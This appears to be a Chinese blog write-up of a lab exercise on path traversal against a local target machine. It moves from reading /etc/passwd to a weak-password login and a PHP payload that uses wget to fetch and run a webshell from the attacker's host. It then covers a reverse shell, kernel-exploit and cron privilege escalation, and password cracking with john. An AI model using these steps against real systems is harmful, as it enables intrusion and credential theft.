路径遍历(目录遍历)

一、简介

路径遍历攻击也称为目录遍历,旨在,访问存储在web根文件夹之外的文件和目录。通过操纵带有“点-斜线(…)”序列及其变化的文件或使用绝对路径来引用文件的变量,来访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置和关键系统文件。需要注意的是,系统访问控制(如在微软Windows操作系统上锁定或使用文件)限制了对文件的访问权限。
这种攻击也称为“点-点斜线”、“目录遍历”、“目录爬升”和“回溯”。
靶机:192.168.1.113

攻击机:192.168.1.110

owasp-zap web漏洞扫描器,自动挖掘web应用程序中的漏洞
在这里插入图片描述
高危漏洞path traversal
在这里插入图片描述
打开之后发现一串代码,这是返回etc/passwd/的文件信息,
接下来在浏览器中把passswd修改为shadow就可以查看该站点shadow的文件内容,但是发现并没有返回shadow的对应信息,因为服务器设置的shadow是不可用的,修改路径可以得到不同的内容,只要该路径下存在该内容,或者该文件设置的对应权限是可读的。

二、利用目录遍历漏洞获取shell思路:

1、上传webshell到服务器,
2、之后通过对应的目录遍历路径访问webshell,执行webshell。
3、在kali linux当中获取反弹shell;

dbadmin 敏感目录有敏感页面,浏览器访问,使用弱口令尝试登陆;

弱口令有字母型和数字型。

字母型是用123456作为对应的用户名和密码, 数字型是用admin作为用户名和密码。

使用admin进行登录可以进入系统后台。

登陆页面之后 查找可利用的写webshell的点;

在这里插入图片描述gedit php-reverse-shell.php

在这里插入图片描述
mv php-reverse-shell.php shell.php

在这里插入图片描述在系统后台新建数据库,数据表,字段(写入<?php system("cd /tmp;wget http://192.168.1.110:8000/webshell.php;chmod +x webshell.php;php webshell");?>)

在这里插入图片描述
创建服务器用于靶场机器下载对应webshell

python -m “SimpleHTTPServer”

启动监听 nc
nc –nlvp 端口号
端口号为上述自己修改的端口号。

输入id进行查看对应的权限

启动终端

老是做的中间断网,然后有时能反弹shell成功,有时不能,尝试很多次了放弃

三、提权

提权前提:已经拿到低权shell,被入侵机器上有nc,python,perl等工具,有权限上传文件和下载文件

内核溢出漏洞提权,先对系统相关信息收集

查看发行版本:
cat /etc/issue
cat /etc/*-release

查看内核版本:
uname -a

寻找内核溢出代码:
searchsploit 发行版本 内核版本
上传内核溢出代码,编译执行

gcc xxx.c -o exploit

chmod +x exploit

./exploit

明文root密码提权

大多数Linux系统密码都和/etc/passwd和/etc/shadow这两个配置文件息息相关

passwd存储了用户,shadow存储了密码的hash

出于安全考虑passwd是全用户可读,root可写,shadow是仅root可读写的

四、破解用户名和密码

unshadow passwd shadow > cracked

john cracked

计划任务

计划任务是一些定时执行的任务,由crontab管理,具有所属用户的权限,非root权限用户是不可以列出root用户的计划任务的,但/etc/内系统的计划任务可以被列出

默认这些程序由root权限执行,若有幸可将其中脚本配置成任意用户可写的管理员,即可修改脚本连回rootshell,若定时执行的文件是py脚本,可使用脚本来替换之前的脚本

靶场代码之前有写出来过

五、密码复用

很多管理员会使用相同密码,即数据库或后台密码即是root密码

在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值